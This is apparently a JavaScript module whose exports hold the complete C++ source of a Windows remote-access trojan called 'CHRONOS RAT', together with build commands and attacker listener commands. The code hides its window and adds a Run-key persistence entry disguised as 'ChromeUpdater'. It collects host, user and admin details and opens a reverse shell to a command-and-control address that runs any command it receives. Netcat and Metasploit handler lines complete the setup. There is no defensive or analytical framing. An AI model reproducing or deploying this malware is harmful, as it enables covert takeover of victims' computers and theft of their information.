export const MAIN_CPP = [
  '#include <winsock2.h>',
  '#include <windows.h>',
  '#include <ws2tcpip.h>',
  '#include <winreg.h>',
  '#include <tlhelp32.h>',
  '#include <shlobj.h>',
  '#include <iostream>',
  '#include <string>',
  '#include <sstream>',
  '#include <thread>',
  '#include <vector>',
  '#pragma comment(lib, "ws2_32.lib")',
  '',
  '// ─── CONFIG ───────────────────────────────────────────────',
  '#define C2_HOST   "192.168.1.100"   // ← твой C2 IP',
  '#define C2_PORT   4444              // ← твой порт',
  '#define REG_KEY   "ChromeUpdater"   // ← ключ в реестре',
  '// ──────────────────────────────────────────────────────────',
  '',
  '// Получить путь к текущему исполняемому файлу',
  'std::string GetSelfPath() {',
  '    char buf[MAX_PATH];',
  '    GetModuleFileNameA(NULL, buf, MAX_PATH);',
  '    return std::string(buf);',
  '}',
  '',
  '// Персистентность: HKCU\\Run',
  'void InstallPersistence() {',
  '    HKEY hKey;',
  '    std::string selfPath = GetSelfPath();',
  '    if (RegOpenKeyExA(HKEY_CURRENT_USER,',
  '        "Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run",',
  '        0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS)',
  '    {',
  '        RegSetValueExA(hKey, REG_KEY, 0, REG_SZ,',
  '            (const BYTE*)selfPath.c_str(),',
  '            (DWORD)(selfPath.size() + 1));',
  '        RegCloseKey(hKey);',
  '    }',
  '}',
  '',
  '// Сбор системной информации',
  'std::string GatherSysInfo() {',
  '    std::ostringstream oss;',
  '',
  '    char hostname[256]; DWORD size = sizeof(hostname);',
  '    GetComputerNameA(hostname, &size);',
  '    oss << "[Host]  " << hostname << "\\n";',
  '',
  '    char username[256]; size = sizeof(username);',
  '    GetUserNameA(username, &size);',
  '    oss << "[User]  " << username << "\\n";',
  '',
  '    OSVERSIONINFOEXA osvi{}; osvi.dwOSVersionInfoSize = sizeof(osvi);',
  '    #pragma warning(suppress: 4996)',
  '    GetVersionExA((LPOSVERSIONINFOA)&osvi);',
  '    oss << "[OS]    Windows " << osvi.dwMajorVersion',
  '        << "." << osvi.dwMinorVersion',
  '        << " Build " << osvi.dwBuildNumber << "\\n";',
  '',
  '    MEMORYSTATUSEX memStat{}; memStat.dwLength = sizeof(memStat);',
  '    GlobalMemoryStatusEx(&memStat);',
  '    oss << "[RAM]   " << (memStat.ullTotalPhys / 1024 / 1024) << " MB\\n";',
  '',
  '    BOOL isAdmin = FALSE; PSID adminGroup = NULL;',
  '    SID_IDENTIFIER_AUTHORITY ntAuth = SECURITY_NT_AUTHORITY;',
  '    AllocateAndInitializeSid(&ntAuth, 2,',
  '        SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS,',
  '        0,0,0,0,0,0, &adminGroup);',
  '    CheckTokenMembership(NULL, adminGroup, &isAdmin);',
  '    FreeSid(adminGroup);',
  '    oss << "[Admin] " << (isAdmin ? "YES" : "NO") << "\\n";',
  '    return oss.str();',
  '}',
  '',
  '// Выполнить shell-команду и вернуть stdout+stderr',
  'std::string ExecCommand(const std::string& cmd) {',
  '    std::string result;',
  '    char buf[512];',
  '    FILE* pipe = _popen((cmd + " 2>&1").c_str(), "r");',
  '    if (!pipe) return "[ERR: popen failed]\\n";',
  '    while (fgets(buf, sizeof(buf), pipe)) result += buf;',
  '    _pclose(pipe);',
  '    return result;',
  '}',
  '',
  '// Основной reverse-shell цикл',
  'void ReverseShell() {',
  '    WSADATA wsa;',
  '    WSAStartup(MAKEWORD(2,2), &wsa);',
  '',
  '    while (true) {',
  '        SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);',
  '        if (sock == INVALID_SOCKET) { Sleep(5000); continue; }',
  '',
  '        sockaddr_in sa{};',
  '        sa.sin_family = AF_INET;',
  '        sa.sin_port   = htons(C2_PORT);',
  '        inet_pton(AF_INET, C2_HOST, &sa.sin_addr);',
  '',
  '        if (connect(sock, (sockaddr*)&sa, sizeof(sa)) == SOCKET_ERROR) {',
  '            closesocket(sock); Sleep(5000); continue;',
  '        }',
  '',
  '        std::string sysinfo = "=== CHRONOS RAT ===\\n" + GatherSysInfo() + "\\nshell> ";',
  '        send(sock, sysinfo.c_str(), (int)sysinfo.size(), 0);',
  '',
  '        char recvBuf[4096];',
  '        while (true) {',
  '            memset(recvBuf, 0, sizeof(recvBuf));',
  '            int bytes = recv(sock, recvBuf, sizeof(recvBuf) - 1, 0);',
  '            if (bytes <= 0) break;',
  '',
  '            std::string cmd(recvBuf, bytes);',
  '            while (!cmd.empty() && (cmd.back() == \'\\n\' || cmd.back() == \'\\r\'))',
  '                cmd.pop_back();',
  '            if (cmd.empty()) continue;',
  '',
  '            std::string output;',
  '            if (cmd == "sysinfo") {',
  '                output = GatherSysInfo();',
  '            } else if (cmd == "exit" || cmd == "quit") {',
  '                send(sock, "Bye.\\n", 5, 0);',
  '                closesocket(sock); WSACleanup(); return;',
  '            } else {',
  '                output = ExecCommand(cmd);',
  '            }',
  '',
  '            if (output.empty()) output = "[no output]\\n";',
  '            output += "shell> ";',
  '            send(sock, output.c_str(), (int)output.size(), 0);',
  '        }',
  '        closesocket(sock);',
  '        Sleep(5000);',
  '    }',
  '    WSACleanup();',
  '}',
  '',
  'int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) {',
  '    ShowWindow(GetConsoleWindow(), SW_HIDE);',
  '    InstallPersistence();',
  '    std::thread shellThread(ReverseShell);',
  '    shellThread.join();',
  '    return 0;',
  '}',
].join('\n');

export const COMPILE_CMD = [
  '# MinGW / g++',
  'g++ -o trojan.exe main.cpp -lws2_32 -mwindows -O2 -s',
  '',
  '# MSVC (Developer Command Prompt)',
  'cl /O2 /EHsc main.cpp /link ws2_32.lib shell32.lib advapi32.lib /SUBSYSTEM:WINDOWS',
].join('\n');

export const LISTENER_CMD = [
  '# Базовый netcat слушатель на C2-сервере',
  'nc -lvnp 4444',
  '',
  '# С rlwrap (история команд, удобнее)',
  'rlwrap nc -lvnp 4444',
  '',
  '# Metasploit (если хочешь multi/handler)',
  'msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/shell_reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; run"',
].join('\n');
